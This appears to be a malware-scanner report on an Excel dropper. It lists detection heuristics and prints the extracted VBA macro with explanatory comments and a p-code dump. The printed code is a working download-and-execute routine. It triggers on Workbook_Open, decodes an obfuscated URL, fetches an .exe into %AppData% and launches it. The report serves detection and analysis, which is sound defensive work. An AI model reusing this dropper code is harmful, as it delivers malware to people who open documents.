MALICIOUS
276
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
The sample is an Excel file containing a Workbook_Open VBA macro that uses the URLDownloadToFile API to download a second-stage payload. The macro attempts to save the payload to the AppData directory. The presence of the Workbook_Open macro together with the use of URLDownloadToFile is a strong indicator of downloader or dropper functionality.
Heuristics 8
-
ClamAV: Xls.Dropper.Agent-7783762-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Xls.Dropper.Agent-7783762-0
-
Reference to URLDownloadToFile API — critical — SC_STR_URLDOWNLOAD: Reference to URLDownloadToFile API
-
VBA macros detected — medium — 3 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
URLDownloadToFile in VBA — critical — OLE_VBA_DOWNLOAD: URLDownloadToFile in VBA. Matched line in script:
Private Declare PtrSafe Function BmtAQrrGwzrPtXVDsM Lib "urlmon" Alias _ "URLDownloadToFileA" (ByVal DuHRBAooPXkMgLjBNBz As Long, ByVal tLIf As String, _ ByVal OZfcnEFbclJqTjPVpxnSNOMR As String, ByVal CvChH As Long, ByVal tJNPHhJoYTIdTKXjRQ As Long) As Long -
Workbook_Open macro — low — OLE_VBA_WBOPEN: Workbook_Open macro. Matched line in script:
Sub Workbook_Open() -
Environ() call (env variable access) — low — OLE_VBA_ENVIRON: Environ() call (env variable access). Matched line in script:
VBnmKlOUVFvBvOIoplJNmquxoHnmgTREsdCvBNjyukolplkjhnmnbvdftgberdasxcb = Decrypt("fyf/sskk") acvNjuUjKmNbVCxdDEfJjNdVFnJmklPoIujmnBGvcBhFH = Environ$("AppData") & "\" & VBnmKlOUVFvBvOIoplJNmquxoHnmgTREsdCvBNjyukolplkjhnmnbvdftgberdasxcb -
Reference to ShellExecute API — high — SC_STR_SHELLEXEC: Reference to ShellExecute API
-
Macro/content-enable lure — medium — SE_ENABLE_LURE: Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10212 bytes |
SHA-256: 1208bb92161f3d36c2bdc2f31280b7cd5b5e637472b7227dd4e076725e1b839a
|||
Preview script — first 1,000 lines of the extracted script
' Module1 (standard module). Its only procedure, Sub Bil below, is empty;
' the dropper logic lives in the workbook module ("YufjTbook") further down.
Attribute VB_Name = "Module1"
' Empty procedure; nothing in the extracted source calls it. Looks like filler.
' NOTE(review): the p-code dump further down lists Module1's procedure under a
' different name (Sub RPJcYvRqvsDGVrsBLGkzSm) - source/p-code identifier
' mismatch; confirm whether the decompressed source matches what actually runs.
Sub Bil()
End Sub
' Workbook document module renamed "YufjTbook" (VB_Base GUID 00020819 is the
' Excel Workbook class). VB_PredeclaredId = True gives it a default instance,
' which is what lets the Workbook_Open handler below run automatically when
' the file is opened with macros enabled.
Attribute VB_Name = "YufjTbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Win32 imports behind random-looking names; the Alias is the real export, so
' string hunting for the API names still works even though the VBA identifiers
' are junk. Parameter names are junk too and carry no meaning.
' EPSiDEOXSw = shell32!ShellExecuteA (hwnd, verb, file, params, dir, showCmd);
' used below to launch the downloaded file.
Private Declare PtrSafe Function EPSiDEOXSw Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal EqRoAOwNzDe As Long, ByVal RPJcYvRqvsDGVrsBLGkzSm As String, _
ByVal FApUefdiSLTxKJ As String, ByVal ZegXxMEpWYtVbpzThUHi As String, ByVal EDgMe As String, ByVal QUuUgZspLiGyuGWmHvEcW As Long) As Long
' BmtAQrrGwzrPtXVDsM = urlmon!URLDownloadToFileA (pCaller, url, fileName,
' reserved, callback); fetches a URL straight to disk from the Excel process.
Private Declare PtrSafe Function BmtAQrrGwzrPtXVDsM Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal DuHRBAooPXkMgLjBNBz As Long, ByVal tLIf As String, _
ByVal OZfcnEFbclJqTjPVpxnSNOMR As String, ByVal CvChH As Long, ByVal tJNPHhJoYTIdTKXjRQ As Long) As Long
' Download-and-execute routine (the actual dropper). Called only from
' Workbook_Open below. Both strings are stored obfuscated and recovered at
' runtime via Decrypt (reverse + shift each character code down by one).
' Neither API return value is checked, so ShellExecute is attempted even if
' the download failed. Detection angle: EXCEL.EXE loading urlmon for a
' download and then spawning a new process out of %AppData%.
Sub DVBmKLPlJhtgBnJNVFilWTumNbvcxlpojnvcftYhjpKnrFBkyX()
' Six locals declared; only the first three are used. The last three are
' never assigned or read (padding).
Dim EGxGFtFkNbZtjHjhbvhjkkFTYhTDhgcfIklBDCVBNMkLoujggffddFV As String
Dim VBnmKlOUVFvBvOIoplJNmquxoHnmgTREsdCvBNjyukolplkjhnmnbvdftgberdasxcb As String
Dim acvNjuUjKmNbVCxdDEfJjNdVFnJmklPoIujmnBGvcBhFH As String
Dim RthJGDbmTwPvSlKlwqIsOyIOKWKMJjgfjduhcbcvs As String
Dim WmKOLPkhrtYhNjMnCJLUsnQKmLolPuJNmHGVBtdFvbZxae As String
Dim QwetyhgfncmvlhpoikBNmVCXDFGNSzFYhWCxywBmtAUKMnBG As String
' Payload file name; decodes to a short name ending in ".exe".
VBnmKlOUVFvBvOIoplJNmquxoHnmgTREsdCvBNjyukolplkjhnmnbvdftgberdasxcb = Decrypt("fyf/sskk")
' Drop path: %AppData%\<payload name> (user-writable, no elevation needed).
acvNjuUjKmNbVCxdDEfJjNdVFnJmklPoIujmnBGvcBhFH = Environ$("AppData") & "\" & VBnmKlOUVFvBvOIoplJNmquxoHnmgTREsdCvBNjyukolplkjhnmnbvdftgberdasxcb
' Download URL; decodes to an https:// URL whose path ends in ".exe".
EGxGFtFkNbZtjHjhbvhjkkFTYhTDhgcfIklBDCVBNMkLoujggffddFV = Decrypt("fyf/KLKOLEDWIHIIKIKPD0SFWMJT0mq/{jc/eqvujyjnfmjo00;tquui")
' URLDownloadToFileA(NULL, url, dropPath, 0, NULL) - result discarded.
BmtAQrrGwzrPtXVDsM 0, EGxGFtFkNbZtjHjhbvhjkkFTYhTDhgcfIklBDCVBNMkLoujggffddFV, acvNjuUjKmNbVCxdDEfJjNdVFnJmklPoIujmnBGvcBhFH, 0, 0
' ShellExecuteA(NULL, "open", dropPath, "", NULL, vbNormalFocus=1) - runs the
' downloaded file; result discarded.
EPSiDEOXSw 0, "open", acvNjuUjKmNbVCxdDEfJjNdVFnJmklPoIujmnBGvcBhFH, "", vbNullString, vbNormalFocus
End Sub
' Auto-execution entry point: Excel runs this handler when the workbook is
' opened with macros enabled (hence the enable-macros lure flagged above).
' Its only job is to call the download-and-execute routine.
Sub Workbook_Open()
DVBmKLPlJhtgBnJNVFilWTumNbvcxlpojnvcftYhjpKnrFBkyX
End Sub
' Dead code. Not called anywhere in the extracted source, never assigns its
' own return value, and every local is written once and (apart from the
' "*x*" pattern used in the Like test) never read. Several non-integer
' literals are assigned to Byte/Long/Boolean variables and are silently
' rounded/coerced by VBA. Presumably junk padding to change the file's
' hash and signature profile rather than anything functional.
Public Function mutiqueshed(burgerorgan, bonusshoot)
qoxnwkqnhfshhimr = "*" & burgerorgan & "*"
Dim be3a8c1f30f1ababb648e22b16fdc57d3 As Double
be3a8c1f30f1ababb648e22b16fdc57d3 = 242.162
Dim columnwall As Byte
columnwall = 114.429
Dim t0ea0a0840384a15e019665b2e996b72f As Long
t0ea0a0840384a15e019665b2e996b72f = 184.954
Dim n2b549c2e42dc58d564726b5780212aba As Double
n2b549c2e42dc58d564726b5780212aba = 185.115
dhmpmrvyvrxwv = ""
Dim m974e3e334b64ac13b6dec997fcabf21f As String
m974e3e334b64ac13b6dec997fcabf21f = "naiveremove"
Dim b08576ffe41cb67690655f1261f410844 As Byte
b08576ffe41cb67690655f1261f410844 = 19.227
Dim z2c55929d38494d4bf3ab6ba3dd15305c As Boolean
z2c55929d38494d4bf3ab6ba3dd15305c = 93.904
Dim b9d76f7072ca3da29e82e55579143fbc0 As Double
b9d76f7072ca3da29e82e55579143fbc0 = 108.662
' Only branch in the function; its body just assigns more unused locals.
If Not bonusshoot Like qoxnwkqnhfshhimr Then
dhmpmrvyvrxwv = burgerorgan
Dim kqeepfyakmzwuediw As Double
kqeepfyakmzwuediw = 61.491
' Always true (61.491 <> 189.252), so this inner block is unconditional.
If kqeepfyakmzwuediw <> 189.252 Then
Dim flamesight As Byte
flamesight = 212.797
Dim sweartrust As Long
sweartrust = 235.981
Dim prqhhqrabc As String
prqhhqrabc = "fadzjgdilazu"
End If
End Function
' String de-obfuscation helper used for the payload name and URL above.
' Scheme: reverse the input, then shift every character code down by one
' (Chr(Asc(c) - 1)). Trivially reversible; there is no key.
' The local named "AppData" is just the output accumulator and has nothing
' to do with the AppData environment variable - name chosen to mislead,
' presumably. The parameter is reassigned in place, but both call sites pass
' string literals, so no caller variable is affected.
Private Function Decrypt(enc)
Dim x, v, AppData
enc = StrReverse(enc)
For v = 1 To Len(enc)
x = Mid(enc, v, 1)
AppData = AppData & Chr(Asc(x) - 1)
Next
Decrypt = AppData
End Function
' Worksheet modules Sheet1..Sheet3 (VB_Base GUID 00020820 is the Excel
' Worksheet class). They carry attributes only; no procedures appear in
' the extracted source for any of them.
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Processing file: /tmp/qstore__t236yey
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/Module1 - 950 bytes
' Line #0:
' FuncDefn (Sub RPJcYvRqvsDGVrsBLGkzSm())
' Line #1:
' Line #2:
' EndSub
' _VBA_PROJECT_CUR/VBA/YufjTbook - 6404 bytes
' Line #0:
' LineCont 0x0008 08 00 00 00 14 00 00 00
' FuncDefn (Private Declare PtrSafe Function ZegXxMEpWYtVbpzThUHi Lib "OZfcnEFbclJqTjPVpxnSNOMR" (ByVal EDgMe As Long, ByVal QUuUgZspLiGyuGWmHvEcW As String, ByVal shell32.dll As String, ByVal BmtAQrrGwzrPtXVDsM As String, ByVal DuHRBAooPXkMgLjBNBz As String, ByVal tLIf As Long) As Long)
' Line #1:
' Line #2:
' LineCont 0x0008 08 00 00 00 14 00 00 00
' FuncDefn (Private Declare PtrSafe Function CvChH Lib "acvNjuUjKmNbVCxdDEfJjNdVFnJmklPoIujmnBGvcBhFH" (ByVal tJNPHhJoYTIdTKXjRQ As Long, ByVal urlmon As String, ByVal DVBmKLPlJhtgBnJNVFilWTumNbvcxlpojnvcftYhjpKnrFBkyX As String, ByVal EGxGFtFkNbZtjHjhbvhjkkFTYhTDhgcfIklBDCVBNMkLoujggffddFV As Long, ByVal VBnmKlOUVFvBvOIoplJNmquxoHnmgTREsdCvBNjyukolplkjhnmnbvdftgberdasxcb As Long) As Long)
' Line #3:
' Line #4:
' FuncDefn (Sub RthJGDbmTwPvSlKlwqIsOyIOKWKMJjgfjduhcbcvs())
' Line #5:
' Dim
' VarDefn WmKOLPkhrtYhNjMnCJLUsnQKmLolPuJNmHGVBtdFvbZxae (As String)
' Line #6:
' Dim
' VarDefn QwetyhgfncmvlhpoikBNmVCXDFGNSzFYhWCxywBmtAUKMnBG (As String)
' Line #7:
' Dim
' VarDefn Decrypt (As String)
' Line #8:
' Dim
' VarDefn Environ (As String)
' Line #9:
' Dim
' VarDefn vbNullString (As String)
' Line #10:
' Dim
' VarDefn vbNormalFocus (As String)
' Line #11:
' LitStr 0x0008 "fyf/sskk"
' ArgsLd UjkIkikJhHhDkfhfHffhUjfnffhfnhf_Open 0x0001
' St QwetyhgfncmvlhpoikBNmVCXDFGNSzFYhWCxywBmtAUKMnBG
' Line #12:
' LitStr 0x0007 "AppData"
' ArgsLd mutiqueshed$ 0x0001
' LitStr 0x0001 "\"
' Concat
' Ld QwetyhgfncmvlhpoikBNmVCXDFGNSzFYhWCxywBmtAUKMnBG
' Concat
' St Decrypt
' Line #13:
' Line #14:
' Line #15:
' LitStr 0x0038 "fyf/KLKOLEDWIHIIKIKPD0SFWMJT0mq/{jc/eqvujyjnfmjo00;tquui"
' ArgsLd UjkIkikJhHhDkfhfHffhUjfnffhfnhf_Open 0x0001
' St WmKOLPkhrtYhNjMnCJLUsnQKmLolPuJNmHGVBtdFvbZxae
' Line #16:
' Line #17:
' LitDI2 0x0000
' Ld WmKOLPkhrtYhNjMnCJLUsnQKmLolPuJNmHGVBtdFvbZxae
' Ld Decrypt
' LitDI2 0x0000
' LitDI2 0x0000
' ArgsCall CvChH 0x0005
' Line #18:
' LitDI2 0x0000
' LitStr 0x0004 "open"
' Ld Decrypt
' LitStr 0x0000 ""
' Ld burgerorgan
' Ld bonusshoot
' ArgsCall ZegXxMEpWYtVbpzThUHi 0x0006
' Line #19:
' EndSub
' Line #20:
' Line #21:
' Line #22:
' Line #23:
' Line #24:
' FuncDefn (Sub id_0296())
' Line #25:
' Line #26:
' ArgsCall RthJGDbmTwPvSlKlwqIsOyIOKWKMJjgfjduhcbcvs 0x0000
' Line #27:
' EndSub
' Line #28:
' Line #29:
' Line #30:
' FuncDefn (Public Function be3a8c1f30f1ababb648e22b16fdc57d3(columnwall, t0ea0a0840384a15e019665b2e996b72f, id_FFFE As Variant))
' Line #31:
' LitStr 0x0001 "*"
' Ld columnwall
' Concat
' LitStr 0x0001 "*"
' Concat
' St n2b549c2e42dc58d564726b5780212aba
' Line #32:
' Dim
' VarDefn dhmpmrvyvrxwv (As Double)
' Line #33:
' LitR8 0xBE77 0x1A9F 0x452F 0x406E
' St dhmpmrvyvrxwv
' Line #34:
' Dim
' VarDefn m974e3e334b64ac13b6dec997fcabf21f (As Byte)
' Line #35:
' LitR8 0x7EFA 0xBC6A 0x9B74 0x405C
' St m974e3e334b64ac13b6dec997fcabf21f
' Line #36:
' Dim
' VarDefn b08576ffe41cb67690655f1261f410844 (As Long)
' Line #37:
' LitR8 0x0C4A 0x2B02 0x1E87 0x4067
' St b08576ffe41cb67690655f1261f410844
' Line #38:
' Dim
' VarDefn z2c55929d38494d4bf3ab6ba3dd15305c (As Double)
' Line #39:
' LitR8 0xE148 0x147A 0x23AE 0x4067
' St z2c55929d38494d4bf3ab6ba3dd15305c
' Line #40:
' LitStr 0x0000 ""
' St b9d76f7072ca3da29e82e55579143fbc0
' Line #41:
' Dim
' VarDefn kqeepfyakmzwuediw (As String)
' Line #42:
' LitStr 0x000B "naiveremove"
' St kqeepfyakmzwuediw
' Line #43:
' Dim
' VarDefn flamesight (As Byte)
' Line #44:
' LitR8 0x3127 0xAC08 0x3A1C 0x4033
' St flamesight
' Line #45:
' Dim
' VarDefn sweartrust (As Boolean)
' Line #46:
' LitR8 0xE560 0x22D0 0x79DB 0x4057
' St sweartrust
' Line #47:
' Dim
' VarDefn prqhhqrabc (As Double)
' Line #48:
' LitR8 0x7CEE 0x353F 0x2A5E 0x405B
' St prqhhqrabc
' Line #49:
' Ld t0ea0a0840384a15e019665b2e996b72f
' Ld n2b549c2e42dc58d564726b5780212aba
' Like
' Not
' IfBlock
' Line #50:
' Ld columnwall
' St b9d76f7072ca3da29e82e55579143fbc0
' Line #51:
' Dim
' VarDefn enc (As Double)
' Line #52:
' LitR8 0x2B02 0x1687 0xBED9 0x404E
' St enc
' Line #53:
' Ld enc
' LitR8 0xD2F2 0x624D 0xA810 0x4067
' Ne
' IfBlock
' Line #54:
' Dim
' VarDefn x (As Byte)
' Line #55:
' LitR8 0xDD2F 0x0624 0x9981 0x406A
' St x
' Line #56:
' Dim
' VarDefn v (As Long)
' Line #57:
' LitR8 0xAC08 0x5A1C 0x7F64 0x406D
' St v
' Line #58:
' Dim
' VarDefn AppData (As String)
' Line #59:
' LitStr 0x000C "fadzjgdilazu"
' St AppData
' Line #60:
' EndIfBlock
' Line #61:
' EndFunc
' Line #62:
' Line #63:
' FuncDefn (Private Function UjkIkikJhHhDkfhfHffhUjfnffhfnhf_Open(StrReverse, id_FFFE As Variant))
' Line #64:
' Dim
' VarDefn Chr
' VarDefn Asc
' VarDefn Sheet1
' Line #65:
' Ld StrReverse
' ArgsLd Sheet2 0x0001
' St StrReverse
' Line #66:
' StartForVariable
' Ld Asc
' EndForVariable
' LitDI2 0x0001
' Ld StrReverse
' FnLen
' For
' Line #67:
' Ld StrReverse
' Ld Asc
' LitDI2 0x0001
' ArgsLd Mid 0x0003
' St Chr
' Line #68:
' Ld Sheet1
' Ld Chr
' ArgsLd Workbook 0x0001
' LitDI2 0x0001
' Sub
' ArgsLd Sheet3 0x0001
' Concat
' St Sheet1
' Line #69:
' StartForVariable
' Next
' Line #70:
' Ld Sheet1
' St UjkIkikJhHhDkfhfHffhUjfnffhfnhf_Open
' Line #71:
' EndFunc
' _VBA_PROJECT_CUR/VBA/Sheet1 - 977 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 977 bytes
' _VBA_PROJECT_CUR/VBA/Sheet3 - 977 bytes
|
|||